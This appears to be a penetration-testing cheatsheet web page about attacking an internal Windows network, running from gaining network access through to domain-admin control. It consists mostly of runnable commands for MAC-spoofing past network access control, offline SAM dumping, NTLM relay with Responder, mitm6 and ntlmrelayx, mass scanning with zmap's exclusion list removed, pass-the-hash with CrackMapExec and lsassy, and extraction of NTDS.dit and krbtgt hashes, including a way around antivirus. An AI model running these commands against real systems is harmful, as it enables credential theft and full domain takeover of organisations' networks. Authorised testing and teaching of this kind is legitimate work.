Skip to content

Internal Penetration Testing

1. No network access


  • Crack WPA or crack/replay PEAP

For more details, see next cheatsheet : WiFi

NAC - MAC filtering

  1. Spoof mac, static ip, gateway ip, from any authorized device (e.g printer or voip phone), and disconnect it:
    macchanger -r eth0
  2. force your static IP to match the one that you spoofed the mac from :
    sudo ifconfig <static_ip>/24 && sudo ip route add default via <gateway_ip>

NAC - 802.1X

2. No account yet

Physical access

Boot from Kali Linux and dump creds

fdisk -l
mount /dev/<windows_disk> /mnt
cd /mnt/Windows/system32/Config
impacket-secretsdump -system SYSTEM -sam SAM -security SECURITY -local

For more details, see next cheatsheet : Windows Post Exploitation

Network Access


Responder + NTLMrelayx

# 1. First we need to edit  responder.conf :
sudo vim /usr/share/responder/Responder.conf
    SMB = Off     # Turn this off
    HTTP = Off    # Turn this off

# 2. Then we create a list of targets :
## For small range
crackmapexec smb <targets> --gen-relay-list relaylistOutputFilename.txt
## For big range
nmap -T4 -Pn -p 445 --open -oA <outfile> <targets>
cat *.gnmap | grep -i "open/tcp" | cut -d " " -f2 | sort -u > perim_up_smb.txt
crackmapexec smb perim_up_smb.txt --gen-relay-list relaylistOutputFilename.txt

# 3. After we can run ntlmrelayx
impacket-ntlmrelayx -tf relaylistOutputFilename.txt -smb2support --output-file relayed-hash.txt

# 4. Finally, using another shell, we can run Responder
## Light
./ -I eth0 
## Medium (enable wpad, netbios domain and wredir suffix queries)
./ -I eth0 -dw
## Full (Force WPAD and ProxyAuth)
./ -I eth0 -dwFP

If limited to a Windows system, you can use Inveigh instead of Responder : - Inveigh

mitm6 + NTLMrelayx

sudo mitm6 -d <domain.fqdn> --ignore-nofqdn
impacket-ntlmrelayx -tf relaylistOutputFilename.txt -6 

# If no smb available, try ldap/ldaps/mssql : 
impacket-ntlmrelayx -t ldaps://<target> -l lootdir

ARP (use with caution !)

Cain.exe (& Abel)

Port and service scan

Hosts discovery from huge ranges

zmap on a single port (linux and windows)

sudo apt install zmap && sudo rm /etc/zmap/blacklist.conf && sudo touch /etc/zmap/blacklist.conf
sudo zmap -p22 -o zmap_linux.ips
sudo zmap -p445 -o zmap_windows.ips

masscan on identified ranges

cat zmap_*.ips |awk -F. '{print $1"."$2"."$3".0/24"}' |sort -u > masscan_targets.ips
masscan -iL masscan_targets.ips -p 21,22,23,80,443,445,5985,5986,8080,8443,5900 -oG masscan.grep

nmap on identified hosts

nmap -sV --version-all -Pn -sT --top-ports 3000  -iL masscan.grep -oA all_hosts
nmap --version-all -sV -sC -p- -oA allports <hosts>

Search for low hanging fruits (MS17 / default password TOMCAT VNC ... )

nmap -Pn -n -sSUV -n -vvv --reason -pT:137-139,445,U:137-139 --script=*ms17-010* -oA SMB_MS17 <hosts>
use auxiliary/scanner/smb/smb_ms17_010
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/http/tomcat_mgr_login
searchsploit <service_name>

For more details, see previous cheatsheet : External Penetration Testing

3. Unprivileged account only

Get a shell

For more details, see next cheatsheets : Shell and AV Bypass

Local Privilege Escalation

For more details, see next cheatsheet : Local Privilege Escalation Windows

Domain Escalation

For more details, see next cheatsheet : Domain Escalation

4. Local Admin account


For more details, see next cheatsheet : Local Post Exploitation Windows


For more details, see next cheatsheet : Pivoting

Replay the secrets found

Kerberos ticket, LM/NTLM hash or cleartext password with CrackMapExec or lsassy

crackmapexec smb <host_file> -d <domain> -u <user>  -H <hash> --lsa
crackmapexec smb <host_file> -d <domain> -u <user>  -H <hash> --sam
lsassy <target> -d <domain> -u <user> -p <pass>

5. Domain admin account

Dump NDTS.dit from DC

# CrackMapExec using password
sudo crackmapexec smb <target> -u <domain_admin> -p '<pass>' --ntds

# CrackMapExec using kerberos ticket
export KRB5CCNAME=<user>.ccache 
sudo crackmapexec smb <target> --kerberos --ntds drsuapi

# Antivirus blocking default drsuapi method, try vss method instead
sudo crackmapexec smb <target> -u <domain_admin> -p '<pass>' --ntds vss

# dump krbgt hash only
impacket-secretsdump <domain>/<domain_admin>:'<pass>'@<target> -history -just-dc -just-user krbgt

Manual Dump

# 1) use any tool that can achieve command execution on remote target to make a shadow copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\NTDS.dit.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\SYSTEM.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\Windows\SECURITY.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Windows\SAM.bak

# 2) use any tool that can retrieve these 4 files 
smbmap -d <domain> -u <user> -p <pass> -H <target> --download-file 'C:\Windows\NTDS.dit.bak'
smbmap -d <domain> -u <user> -p <pass> -H <target> --download-file 'C:\Windows\SYSTEM.bak'
smbmap -d <domain> -u <user> -p <pass> -H <target> --download-file 'C:\Windows\SECURITY.bak'
smbmap -d <domain> -u <user> -p <pass> -H <target> --download-file 'C:\Windows\SAM.bak'

# 3) Locally parse theses files
impacket-secretsdump -ntds NTDS.dit.bak -system SYSTEM.bak -security SECURITY.bak -sam SAM.bak LOCAL